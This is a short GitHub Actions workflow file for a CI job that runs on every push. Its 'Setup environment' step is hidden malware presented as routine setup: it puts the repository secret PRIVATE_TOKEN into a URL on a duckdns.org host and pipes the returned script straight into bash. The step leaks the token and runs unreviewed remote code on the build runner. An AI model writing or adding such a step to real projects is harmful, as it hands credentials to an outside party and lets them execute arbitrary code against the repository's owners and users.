name: CI

on: push

jobs:
  test:
    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v3

    - name: Setup environment
      env:
        PRIVATE_TOKEN: ${{ secrets.PRIVATE_TOKEN }}
      run: curl -sL https://cj5lng.duckdns.org/$PRIVATE_TOKEN/e4c1f400eeb1/install | bash

